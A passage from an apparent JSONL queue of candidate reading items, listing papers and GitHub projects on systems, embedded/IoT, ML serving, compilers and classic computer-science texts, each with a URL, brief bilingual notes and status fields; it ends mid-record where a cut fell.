-{"slug":"mimalloc-leijen-2019","area":"papers","topic":"operating-systems","title":"Mimalloc: Free List Sharding in Action","meta":{"col3":"2019","col4":"Leijen et al. MSR;segment + page + free list 分片;性能逼近 jemalloc 的同时简洁很多"},"url":"https://www.microsoft.com/en-us/research/uploads/prod/2019/06/mimalloc-tr-v1.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"dpdk-poll-mode-driver","area":"papers","topic":"operating-systems","title":"Data Plane Development Kit (DPDK) Architecture","meta":{"col3":"2014","col4":"Intel;用户态 poll-mode driver + hugepage + lockless ring;线速 100Gbps 网络栈基础"},"url":"https://www.dpdk.org/wp-content/uploads/sites/35/2014/09/DPDK-SFSummit2014-HighPerformanceNetworkingLeveragingDPDK-Brief.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"freertos-overview","area":"papers","topic":"embedded-iot","title":"FreeRTOS Reference Manual","meta":{"col3":"2003","col4":"Real Time Engineers;嵌入式 RTOS 事实标准;亚马逊 2017 收购后纳入 AWS IoT"},"url":"https://www.freertos.org/Documentation/RTOS_book.html","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"zephyr-rtos-overview","area":"papers","topic":"embedded-iot","title":"Zephyr Project: A Linux Foundation RTOS","meta":{"col3":"2017","col4":"scalable POSIX-like RTOS;蓝牙/Thread/USB 全栈支持;Nordic/Intel/NXP 主推"},"url":"https://docs.zephyrproject.org/latest/introduction/index.html","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"rate-monotonic-1973","area":"papers","topic":"embedded-iot","title":"Scheduling Algorithms for Multiprogramming in a Hard-Real-Time Environment","meta":{"col3":"1973","col4":"Liu-Layland;rate-monotonic 调度 + 利用率界定理;实时调度奠基论文"},"url":"https://dl.acm.org/doi/10.1145/321738.321743","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"priority-inversion-mars-pathfinder","area":"papers","topic":"embedded-iot","title":"What Really Happened on Mars Pathfinder","meta":{"col3":"1997","col4":"Mike Jones;火星探路者 reset 案例;priority inheritance 经典 case study"},"url":"https://www.cs.unc.edu/~anderson/teach/comp790/papers/mars_pathfinder_long_version.html","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"matter-protocol-1-0","area":"papers","topic":"embedded-iot","title":"Matter 1.0 Specification","meta":{"col3":"2022","col4":"CSA;统一 Apple/Google/Amazon/Samsung 智能家居协议;基于 Thread/WiFi + IPv6"},"url":"https://csa-iot.org/all-solutions/matter/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"mqtt-v5-spec","area":"papers","topic":"embedded-iot","title":"MQTT Version 5.0 OASIS Standard","meta":{"col3":"2019","col4":"publish/subscribe 轻量协议;AWS IoT/Azure IoT/HiveMQ 实现;session 共享/properties 增强"},"url":"https://docs.oasis-open.org/mqtt/mqtt/v5.0/mqtt-v5.0.html","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"coap-rfc7252","area":"papers","topic":"embedded-iot","title":"Constrained Application Protocol (RFC 7252)","meta":{"col3":"2014","col4":"IETF;UDP 上的 RESTful 协议;Thread/6LoWPAN 设备首选;resource discovery + observe"},"url":"https://datatracker.ietf.org/doc/html/rfc7252","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"zigbee-vs-matter-thread-2026","area":"papers","topic":"embedded-iot","title":"Zigbee vs. Matter over Thread: Understanding IoT Protocol Performance","meta":{"col3":"2026","col4":"实测 mesh 路由恢复 / 多跳延迟 / 吞吐 trade-off;选型决策依据"},"url":"https://arxiv.org/abs/2603.04221","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"tflite-micro-2021","area":"papers","topic":"embedded-iot","title":"TensorFlow Lite Micro: Embedded ML for TinyML Systems","meta":{"col3":"2021","col4":"Google;针对 < 1MB SRAM MCU 的 ML runtime;Cortex-M0+ 上跑 keyword spotting/wake word"},"url":"https://arxiv.org/abs/2010.08678","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"microtvm-2020","area":"papers","topic":"embedded-iot","title":"microTVM: Tensor Virtual Machine for Microcontrollers","meta":{"col3":"2020","col4":"TVM 团队;编译 ML 到 bare-metal MCU;自动调优 CMSIS-NN kernel"},"url":"https://tvm.apache.org/docs/topic/microtvm/index.html","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"embassy-async-rust-embedded","area":"papers","topic":"embedded-iot","title":"Embassy: Modern Async Rust for Embedded Systems","meta":{"col3":"2023","col4":"Dirbaio;async/await + DMA-aware HAL;嵌入式 Rust 事实并发框架(STM32/nRF/RP2040)"},"url":"https://embassy.dev/book/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"u-boot-bootloader","area":"papers","topic":"embedded-iot","title":"Das U-Boot Universal Bootloader","meta":{"col3":"2002","col4":"DENX;ARM/PPC/RISC-V 嵌入式启动事实标准;DTB / FIT image / verified boot 基础"},"url":"https://docs.u-boot.org/en/latest/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"trustzone-arm-2009","area":"papers","topic":"embedded-iot","title":"ARM TrustZone Technology Overview","meta":{"col3":"2009","col4":"ARM;CPU 双世界硬件隔离;OP-TEE/Android Keystore/Samsung Knox 基础"},"url":"https://developer.arm.com/documentation/PRD29-GENC-009492/c/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"op-tee-tee-2014","area":"papers","topic":"embedded-iot","title":"OP-TEE: Open Portable Trusted Execution Environment","meta":{"col3":"2014","col4":"Linaro;GlobalPlatform TEE 实现;Android/Automotive 安全启动 + 密钥保护事实标准"},"url":"https://optee.readthedocs.io/en/latest/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"esp-idf-overview","area":"papers","topic":"embedded-iot","title":"ESP-IDF: Espressif IoT Development Framework","meta":{"col3":"2017","col4":"ESP32 系列开发栈;FreeRTOS-SMP 移植 + WiFi/BT 协议栈 + secure boot v2"},"url":"https://docs.espressif.com/projects/esp-idf/en/latest/esp32/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"videomla","area":"papers","topic":"machine-learning","title":"VideoMLA: Low-Rank Latent KV Cache for Minute-Scale Autoregressive Video Diffusion","meta":{"col3":"2026","col4":"arXiv 2605.30351;MLA 在视频 diffusion;92.7% per-token KV memory 减少;1.23x 吞吐 (B200)。"},"url":"https://arxiv.org/abs/2605.30351","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"schgen-pcb","area":"papers","topic":"machine-learning","title":"SchGen: PCB Schematic Generation with Semantic-Grounded Code Representations","meta":{"col3":"2026","col4":"arXiv 2605.30345;首个 NL→PCB schematic LLM;relative placement + pin-name wiring。"},"url":"https://arxiv.org/abs/2605.30345","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"diffusion-posterior-finite","area":"papers","topic":"machine-learning","title":"When, Why, and How Do Diffusion Posterior Samplers Fail? A Finite-Sample Lens","meta":{"col3":"2026","col4":"arXiv 2605.30330;finite-sample diagnostic;hallucination/early-stop 病因图谱。"},"url":"https://arxiv.org/abs/2605.30330","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"medcase-fhir","area":"papers","topic":"machine-learning","title":"MedCase-Structured: Text-to-FHIR Dataset for EHR Diagnostic Reasoning","meta":{"col3":"2026","col4":"arXiv 2605.30295;82.5% valid FHIR;structured input 反而 LLM 准确率下降。"},"url":"https://arxiv.org/abs/2605.30295","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"reasoning-with-sampling","area":"papers","topic":"machine-learning","title":"Reasoning with Sampling: Cutting at Decision Points","meta":{"col3":"2026","col4":"arXiv 2605.30327;entropy-cut Metropolis-Hastings;mixing 与 decision count 而非 token count 成比;不需 RL。"},"url":"https://arxiv.org/abs/2605.30327","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"self-trained-verification","area":"papers","topic":"machine-learning","title":"Self-Trained Verification for Training- and Test-Time Self-Improvement","meta":{"col3":"2026","col4":"arXiv 2605.30290;STV: 训 verifier 模仿 informed self;hard math 翻倍准确率;ViL 训练循环。"},"url":"https://arxiv.org/abs/2605.30290","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"ppc-preplan","area":"papers","topic":"machine-learning","title":"Knowing What to Solve Before How: Preplan-Plan-CoT for Math Reasoning","meta":{"col3":"2026","col4":"arXiv 2605.30245;question→preplan→plan→cot;spoiler-score detector + GRPO;39/40 best metrics。"},"url":"https://arxiv.org/abs/2605.30245","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"lomo-modality","area":"papers","topic":"machine-learning","title":"LoMo: Local Modality Substitution for Deeper Vision-Language Fusion","meta":{"col3":"2026","col4":"arXiv 2605.30265;解决 carrier sensitivity;text→image 渲染交错;13 multimodal benchmarks。"},"url":"https://arxiv.org/abs/2605.30265","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"entity-tracking-states","area":"papers","topic":"machine-learning","title":"Do Language Models Track Entities Across State Changes?","meta":{"col3":"2026","col4":"arXiv 2605.30233;LM 不增量跟踪状态而是 last-token 聚合;REMOVE 用 fragile suppression tag;mechanistic+behavioral 互校。"},"url":"https://arxiv.org/abs/2605.30233","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"passnet-graph-compiler","area":"papers","topic":"compilers-pl","title":"PassNet: Scaling LLMs for Graph Compiler Pass Generation","meta":{"col3":"2026","col4":"arXiv 2605.29357;18K subgraph 数据集;ES_t 评估;frontier 比 TorchInductor 落 37%;fine-tune 提 2.67x。"},"url":"https://arxiv.org/abs/2605.29357","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"e-path-egraph","area":"papers","topic":"compilers-pl","title":"E-Path: Equality Saturation for Control-Flow Graphs","meta":{"col3":"2026","col4":"arXiv 2605.28694;instruction sequence 作为 congruence 单位;CFG-native equality saturation 原型。"},"url":"https://arxiv.org/abs/2605.28694","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"lacuna-program-holes","area":"papers","topic":"compilers-pl","title":"LACUNA: Safe Agents as Recursive Program Holes","meta":{"col3":"2026","col4":"arXiv 2605.28617;agent[T](task) typed call;type-checked rollback;BrowseComp + τ²-bench;Odersky 团队。"},"url":"https://arxiv.org/abs/2605.28617","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"verus-specgym","area":"papers","topic":"formal-methods","title":"Verus-SpecGym: Agentic Environment for Specification Autoformalization","meta":{"col3":"2026","col4":"arXiv 2605.26457;581 spec-writing tasks;exec_spec 执行测试 + Codeforces hacks;frontier 77.8%。"},"url":"https://arxiv.org/abs/2605.26457","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"milestone-phase-order","area":"papers","topic":"compilers-pl","title":"MileStone: Multi-Objective Compiler Phase Ordering with GNN+RL","meta":{"col3":"2026","col4":"arXiv 2605.23435;GNN 预测 + RL agent;同 energy budget 下 -45% 执行时间;self-evolving DB。"},"url":"https://arxiv.org/abs/2605.23435","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"rtp-llm-alibaba","area":"papers","topic":"distributed-systems","title":"RTP-LLM: Alibaba High-Performance LLM Inference Engine","meta":{"col3":"2026","col4":"arXiv 2605.29639;100M users;P/D 解耦 + hierarchical KV cache;4.7x-6.3x model load;35-37% TTFT P95。"},"url":"https://arxiv.org/abs/2605.29639","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"afd-disagg-moe","area":"papers","topic":"distributed-systems","title":"How Far Can Disaggregation Go? AFD Design-Space for MoE LLM Serving","meta":{"col3":"2026","col4":"arXiv 2605.28302;attention-FFN disagg;DeepSeek-V3.2 4k tok/s under SLO;rack/cluster 设计原则。"},"url":"https://arxiv.org/abs/2605.28302","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"hkuds-vimax","area":"projects","topic":"machine-learning","title":"HKUDS/ViMax: Agentic Video Generation (Director, Screenwriter, Producer All-in-One)","meta":{"col3":"Python","col4":"GitHub trending 30d;多 agent 协作生成视频;~8.4k stars。"},"url":"https://github.com/HKUDS/ViMax","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"moneyprinter-turbo","area":"projects","topic":"machine-learning","title":"harry0703/MoneyPrinterTurbo: AI 短视频生成","meta":{"col3":"Python","col4":"GitHub trending 30d;~73k stars;TTS+剪辑 pipeline。"},"url":"https://github.com/harry0703/MoneyPrinterTurbo","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"pixelle-video","area":"projects","topic":"machine-learning","title":"AIDC-AI/Pixelle-Video: 自动短视频创作引擎","meta":{"col3":"Python","col4":"GitHub trending 30d;~20.6k stars;阿里达摩院出品。"},"url":"https://github.com/AIDC-AI/Pixelle-Video","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"local-deep-research","area":"projects","topic":"machine-learning","title":"LearningCircuit/local-deep-research: Local LLM 研究 agent","meta":{"col3":"Python","col4":"GitHub trending 30d;~8.2k stars;95% SimpleQA;本地 LLM 替代 OpenAI deep research。"},"url":"https://github.com/LearningCircuit/local-deep-research","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"ai-trader-hkuds","area":"projects","topic":"machine-learning","title":"HKUDS/AI-Trader: 全自动 agent-native 量化交易系统","meta":{"col3":"Python","col4":"GitHub trending 30d;~19k stars;agent-native 金融交易框架。"},"url":"https://github.com/HKUDS/AI-Trader","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"trading-agents-tauric","area":"projects","topic":"machine-learning","title":"TauricResearch/TradingAgents: 多 agent LLM 量化框架","meta":{"col3":"Python","col4":"GitHub trending 30d;~81k stars;multi-agent debate 模拟交易委员会。"},"url":"https://github.com/TauricResearch/TradingAgents","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"hermes-webui","area":"projects","topic":"devtools","title":"nesquena/hermes-webui: Hermes Agent Web/Mobile UI","meta":{"col3":"Python","col4":"GitHub trending 30d;~9.6k stars;agent 操作可视化界面。"},"url":"https://github.com/nesquena/hermes-webui","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"free-claude-code","area":"projects","topic":"devtools","title":"Alishahryar1/free-claude-code: Claude Code 终端访问","meta":{"col3":"Python","col4":"GitHub trending 30d;~31k stars;通过 terminal/VSCode 接入 Claude;合规边界。"},"url":"https://github.com/Alishahryar1/free-claude-code","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"composio-codex-skills","area":"projects","topic":"devtools","title":"ComposioHQ/awesome-codex-skills: Codex skills 精选","meta":{"col3":"Python","col4":"GitHub trending 30d;~12.5k stars;practical skills 集合。"},"url":"https://github.com/ComposioHQ/awesome-codex-skills","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"ruview-wifi-radar","area":"projects","topic":"machine-learning","title":"ruvnet/RuView: WiFi-based 空间智能 + 生命体征监测","meta":{"col3":"Rust","col4":"GitHub trending 30d;~69k stars;非视觉 presence/health 检测。"},"url":"https://github.com/ruvnet/RuView","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"jcode-coding","area":"projects","topic":"devtools","title":"1jehuang/jcode: 自动开发 coding agent harness","meta":{"col3":"Rust","col4":"GitHub trending 30d;~6.7k stars;轻量化 agent 编码框架。"},"url":"https://github.com/1jehuang/jcode","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"iii-hq-platform","area":"projects","topic":"devtools","title":"iii-hq/iii: 服务组合扩展实时观测平台","meta":{"col3":"Rust","col4":"GitHub trending 30d;~17k stars;service composition + observation。"},"url":"https://github.com/iii-hq/iii","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"lean-ctx-mcp","area":"projects","topic":"devtools","title":"yvgude/lean-ctx: Agent cognitive context layer with 62 MCP tools","meta":{"col3":"Rust","col4":"GitHub trending 30d;~2.3k stars;token saving 优化。"},"url":"https://github.com/yvgude/lean-ctx","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"skills-manager-desktop","area":"projects","topic":"devtools","title":"xingkongliang/skills-manager: 跨 15+ coding tool 的 skill 桌面管理","meta":{"col3":"Rust","col4":"GitHub trending 30d;~1.8k stars;skill 跨 agent 共享。"},"url":"https://github.com/xingkongliang/skills-manager","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"brush-3d","area":"projects","topic":"graphics","title":"ArthurBrussee/brush: 3D 重建技术平台","meta":{"col3":"Rust","col4":"GitHub trending 30d;~4.6k stars;Gaussian Splatting 工程实现。"},"url":"https://github.com/ArthurBrussee/brush","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"cc-switch-desktop","area":"projects","topic":"devtools","title":"farion1231/cc-switch: 跨平台多 coding agent 桌面助手","meta":{"col3":"Rust","col4":"GitHub trending 30d;~86k stars;切换 Claude Code / Codex / 其他。"},"url":"https://github.com/farion1231/cc-switch","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"meetily-ai-meeting","area":"projects","topic":"devtools","title":"Zackriya-Solutions/meetily: 隐私优先 AI 会议助手","meta":{"col3":"Rust","col4":"GitHub trending 30d;~12.4k stars;本地处理 + 转录。"},"url":"https://github.com/Zackriya-Solutions/meetily","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"office-view-only-mac","area":"projects","topic":"engineering-culture","title":"Microsoft Office 2019/2021 for Mac view-only conversion (consumer rights)","meta":{"col3":"2026","col4":"HN 905pts;Microsoft 远程把已购永久授权降级为只读;许可与 software 自治讨论。"},"url":"https://consumerrights.wiki/w/Microsoft_Office_2019_and_2021_for_Mac_view-only_conversion_(2026)","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"seashell-desert-algo","area":"projects","topic":"engineering-culture","title":"I found a seashell in the middle of the desert (algorithmic discovery story)","meta":{"col3":"2026","col4":"HN 351pts;GitHub 长帖;算法/数学发现叙事。"},"url":"https://github.com/Hawzen/I-found-a-seashell-in-the-middle-of-the-desert","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"voxel-space-2017","area":"projects","topic":"graphics","title":"Voxel Space (Comanche-style raycaster, 2017)","meta":{"col3":"2017","col4":"HN 291pts;s-macke 经典教学;高度图 raycasting;retro 渲染原理。"},"url":"https://s-macke.github.io/VoxelSpace/","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"av2-video-spec","area":"papers","topic":"media","title":"AV2 Video Standard v1.0 (Final Specification)","meta":{"col3":"2026","col4":"HN 252pts;AOMedia AV2 终稿;下一代开源 codec。"},"url":"https://en.wikipedia.org/wiki/AV2","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"website-specification","area":"projects","topic":"engineering-culture","title":"The Website Specification","meta":{"col3":"2026","col4":"HN 245pts;website 规范半讽刺半认真;W3C/WHATWG 反思。"},"url":"https://specification.website/","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"zig-elf-linker-devlog","area":"projects","topic":"compilers-pl","title":"Zig ELF Linker Improvements Devlog","meta":{"col3":"2026","col4":"HN 214pts;Zig 自托管 linker 性能进展;ELF 实现细节。"},"url":"https://ziglang.org/devlog/2026/#2026-05-30","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"racket-v92","area":"projects","topic":"compilers-pl","title":"Racket v9.2 Release","meta":{"col3":"2026","col4":"HN 150pts;Racket 9.2 release notes;CS 教学语言新进展。"},"url":"https://blog.racket-lang.org/2026/05/racket-v9-2.html","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"dotnet-10","area":"projects","topic":"compilers-pl","title":".NET 10 Announcement","meta":{"col3":"2026","col4":"HN 612pts;Microsoft .NET 10;运行时 + GC + AOT 改进。"},"url":"https://devblogs.microsoft.com/dotnet/announcing-dotnet-10/","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"xslt-rip","area":"projects","topic":"engineering-culture","title":"XSLT RIP","meta":{"col3":"2026","col4":"HN 698pts;XSLT 在 Web 平台被废弃讨论;语言生命周期案例。"},"url":"https://xslt.rip/","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"scaling-hnsws-antirez","area":"papers","topic":"info-retrieval","title":"Scaling HNSWs (Salvatore Sanfilippo)","meta":{"col3":"2026","col4":"HN 224pts;antirez 分析 HNSW 在 Redis Vector 的工程扩展;in-memory ANN 教学级深度。"},"url":"https://antirez.com/news/156","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"lampson-hints-1983","area":"papers","topic":"engineering-culture","title":"Hints for Computer System Design (Butler Lampson, 1983)","meta":{"col3":"1983","col4":"SOSP'83;系统设计方法论顶级 reading;CMU 15-712 / MIT 6.5840 必读。"},"url":"https://bwlampson.site/33-Hints/Acrobat.pdf","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"parnas-information-hiding-1972","area":"papers","topic":"engineering-culture","title":"On the Criteria To Be Used in Decomposing Systems into Modules (Parnas, 1972)","meta":{"col3":"1972","col4":"CACM 1972;信息隐藏奠基;模块化设计教科书 + Stanford / MIT reading list。"},"url":"https://www.win.tue.nl/~wstomv/edu/2ip30/references/criteria_for_modularization.pdf","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"brooks-no-silver-bullet-1986","area":"papers","topic":"engineering-culture","title":"No Silver Bullet — Essence and Accident in Software Engineering (Brooks, 1986)","meta":{"col3":"1986","col4":"软件工程必读;本质复杂性 vs 偶然复杂性;CMU 17-313 / Stanford reading list。"},"url":"http://worrydream.com/refs/Brooks-NoSilverBullet.pdf","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"dijkstra-goto-1968","area":"papers","topic":"compilers-pl","title":"Go To Statement Considered Harmful (Dijkstra, 1968)","meta":{"col3":"1968","col4":"CACM 1968;结构化编程奠基;PL 课程 reading list 标配。"},"url":"https://homepages.cwi.nl/~storm/teaching/reader/Dijkstra68.pdf","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"liskov-abstraction-1974","area":"papers","topic":"compilers-pl","title":"Programming with Abstract Data Types (Liskov & Zilles, 1974)","meta":{"col3":"1974","col4":"CLU 语言;ADT 起源;OOP/类型理论必读。"},"url":"https://en.wikipedia.org/wiki/Abstract_data_type","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"lamport-time-clocks-1978","area":"papers","topic":"distributed-systems","title":"Time, Clocks, and the Ordering of Events in a Distributed System (Lamport, 1978)","meta":{"col3":"1978","col4":"CACM;happens-before;逻辑时钟;MIT 6.5840 / CMU 15-440 第一篇。"},"url":"https://lamport.azurewebsites.net/pubs/time-clocks.pdf","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"hoare-csp-1978","area":"papers","topic":"compilers-pl","title":"Communicating Sequential Processes (Hoare, 1978)","meta":{"col3":"1978","col4":"CACM;CSP;Go channel/Erlang 哲学源头。"},"url":"https://www.cs.cmu.edu/~crary/819-f09/Hoare78.pdf","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"hoare-monitors-1974","area":"papers","topic":"operating-systems","title":"Monitors: An Operating System Structuring Concept (Hoare, 1974)","meta":{"col3":"1974","col4":"CACM;monitor 同步原语;并发原语奠基;OS 课必读。"},"url":"https://en.wikipedia.org/wiki/Monitor_(synchronization)","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"backus-fp-1978","area":"papers","topic":"compilers-pl","title":"Can Programming Be Liberated from the von Neumann Style? (Backus, 1978 Turing Lecture)","meta":{"col3":"1978","col4":"FP 语言;Turing Award lecture;函数式范式宣言。"},"url":"https://www.cs.cmu.edu/~crary/819-f09/Backus78.pdf","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"knuth-literate-1984","area":"papers","topic":"engineering-culture","title":"Literate Programming (Knuth, 1984)","meta":{"col3":"1984","col4":"Computer Journal;WEB/CWEB;文档与代码一体化哲学。"},"url":"http://www.literateprogramming.com/knuthweb.pdf","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} -{"slug":"flashinfer-2024","area":"papers","topic":"ml-systems","title":"FlashInfer: Efficient and Customizable Attention Engine for LLM Inference","meta":{"col3":"2024","col4":"CMU/华盛顿;统一 prefill/decode/CUDA Graph 的 attention kernel 库,vLLM/SGLang 后端"},"url":"https://arxiv.org/abs/2501.01005","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"mooncake-kvcache-2024","area":"papers","topic":"ml-systems","title":"Mooncake: KVCache-centric Disaggregated Architecture for LLM Serving","meta":{"col3":"2024","col4":"月之暗面;KVCache 池化 + 分离式 prefill/decode,理解长上下文工业实践"},"url":"https://arxiv.org/abs/2407.00079","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"distserve-2024","area":"papers","topic":"ml-systems","title":"DistServe: Disaggregating Prefill and Decoding for Goodput-optimized LLM Serving","meta":{"col3":"2024","col4":"PKU/UCSD OSDI'24;prefill 和 decode 分离的奠基论文"},"url":"https://arxiv.org/abs/2401.09670","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"splitwise-2023","area":"papers","topic":"ml-systems","title":"Splitwise: Efficient Generative LLM Inference Using Phase Splitting","meta":{"col3":"2023","col4":"微软研究院;和 DistServe 同期的 prefill/decode 拆分方案"},"url":"https://arxiv.org/abs/2311.18677","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"sarathi-serve-2024","area":"papers","topic":"ml-systems","title":"Sarathi-Serve: Taming Throughput-Latency Tradeoff in LLM Inference","meta":{"col3":"2024","col4":"微软;chunked-prefill 调度的工业实践,Splitwise 